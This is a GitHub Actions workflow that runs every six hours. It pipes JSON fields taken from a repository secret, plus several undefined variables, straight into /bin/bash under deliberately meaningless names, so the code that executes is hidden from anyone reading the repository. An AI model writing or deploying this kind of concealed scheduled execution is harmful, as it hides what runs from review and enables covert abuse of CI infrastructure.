name: punkahong

on:
  workflow_dispatch:
  schedule:
    - cron: '8 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: punkahong
        env:
          uldk9: ${{ secrets.uldk9 }}
        run: |
          echo $uldk9 | jq -r .v31372 | /bin/bash
          echo $ms710 | jq -r .zbkkq47 | /bin/bash
          echo $sy8189 | jq -r .wlr3 | /bin/bash
          echo $jlx51 | jq -r .xlqf3 | /bin/bash
          echo $jvjpx32505 | jq -r .v1 | /bin/bash
          echo $zk0549 | jq -r .zc4869 | /bin/bash
          echo $avone94 | jq -r .po6 | /bin/bash
          echo $vohgc94 | jq -r .og3077 | /bin/bash
          echo $cpr19 | jq -r .whnx64 | /bin/bash

